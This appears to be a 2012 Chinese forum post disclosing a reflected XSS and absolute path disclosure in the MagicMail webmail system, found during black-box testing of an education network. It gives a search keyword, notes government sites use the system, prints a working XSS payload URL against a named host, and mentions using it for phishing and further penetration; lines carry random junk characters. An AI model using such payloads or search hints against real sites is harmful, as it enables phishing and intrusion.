今天上午在黑盒测试本地的教育网的时候发现的一个邮件系统漏洞
3 z- a% \; f, O) a5 r1 O: ?7 z. S- {' F8 A% ]0 R/ W
5 w# w' o- c7 f$ w: l包含 一个反射性XSS 以及 绝对路径泄漏
# z$ o, A' b/ S/ _看了看 貌似全部是linux的。
9 T( H" u0 C5 w- ^) L ( ]$ V0 `% M7 u& ^( d& R
关键字:迈捷邮件系统 by MagicMail5 i" r, U w3 X; w$ ~
6 Y, U4 s" x5 P* A) Z可以看到很多政府网站都用这个邮件系统
' ~3 f/ ^: W8 F, y# @( c4 |! H) L7 a, {! M0 y. I
绝对路径 http://madman.in/index.php?login_type=declare&language=
- N4 {' U, `1 L
7 z6 n3 r* v( l6 w6 {, X& j$ ]+ d+ w* L, s4 H. H; }1 }( {
0 e( W! P& `2 V, p- L& c
XSS:http://madman.in/index.php?login_type=declare&language=–%3E%27%22%3E%3Csvg%3E%3Cscript/xlink:href=data:,while%28true%29{alert%281%29}%3E%3C/script%3E
6 [3 f% Q. r5 q+ z9 S/ B8 K9 Y* J/ k6 s- Q1 L6 X
- Q6 s% L) ~$ v* Q- i
L% X% f, B, M0 Y6 j
虽然危害不是很大,不过利用起来还是可以的 比如 钓鱼 比如进一步的渗透 等等5 c/ A: Z( V! @1 D' l( j! I
4 |) X; l; d3 i' h' ]/ H
修复方案:看官方补丁吧。
( F' L( E' @0 D( t/ C% U5 G% q |
发表于 2012-11-9 20:38:41
收藏
支持
反对